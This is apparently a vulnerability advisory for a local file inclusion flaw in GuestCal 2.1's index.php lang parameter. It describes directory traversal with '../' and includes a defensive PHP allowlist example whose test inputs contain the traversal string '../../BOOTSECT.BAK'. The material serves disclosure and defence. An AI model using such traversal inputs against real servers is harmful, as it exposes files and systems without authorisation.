Vendor: GuestCal
By: SirGod
CVSS: 7.5 (HIGH)
Vulnerability Type: Local File Inclusion
CWE: 22
Product Name: GuestCal
Affected Version From: 2.1
Affected Version To: 2.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
GuestCal 2.1 (index.php lang) Local File Inclusion Vulnerability
GuestCal 2.1 is vulnerable to local file inclusion through the lang parameter of index.php. An attacker can exploit this by sending a specially crafted HTTP request containing directory traversal characters (e.g. '../') to the vulnerable application. This can allow the attacker to include arbitrary files from the web server's file system, such as the BOOTSECT.BAK file, which can be used to gain access to the system.
Mitigation:
Ensure that user input is properly sanitized and validated before being used in file operations.
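
One way to apply this mitigation to a language selector is shown below. It is an added example, not GuestCal's code. The function name, the allowlist contents and the directory layout are assumptions. The request value is matched against a fixed allowlist and is never concatenated into a path unless it matched, and the canonical path is then checked to lie inside the language directory.

```php
<?php
// Added illustration, not GuestCal source. Names and layout are assumptions.

const LANG_ALLOWED = ['en', 'de', 'fr'];   // assumed set of shipped languages
const LANG_DEFAULT = 'en';

/**
 * Map an untrusted ?lang= value to a language file inside $langDir.
 * Anything that is not an exact allowlist match falls back to the default.
 */
function resolve_lang_file(string $langDir, $requested): string
{
    $lang = LANG_DEFAULT;
    if (is_string($requested) && in_array($requested, LANG_ALLOWED, true)) {
        $lang = $requested;
    } elseif ($requested !== null) {
        // Record the rejected value (JSON-encoded, so it cannot forge log lines).
        error_log('rejected lang value: ' . json_encode($requested));
    }

    // Defence in depth: the canonical path must stay inside the language directory.
    $base = realpath($langDir);
    $real = realpath($langDir . '/' . $lang . '.php');
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('language file unavailable');
    }
    return $real;
}

// Demo with constructed inputs: build a throwaway language directory.
$dir = sys_get_temp_dir() . '/langdemo_' . getmypid();
@mkdir($dir);
foreach (LANG_ALLOWED as $l) {
    file_put_contents("$dir/$l.php", "<?php return [];");
}

// A valid code, a traversal string, a non-string value and a missing parameter.
foreach (['de', '../../BOOTSECT.BAK', ['x'], null] as $input) {
    $file = resolve_lang_file($dir, $input);
    echo json_encode($input, JSON_UNESCAPED_SLASHES), ' => ', basename($file), PHP_EOL;
}

// In the application, only the returned path would be passed to include:
//   include resolve_lang_file(__DIR__ . '/lang', $_GET['lang'] ?? null);
```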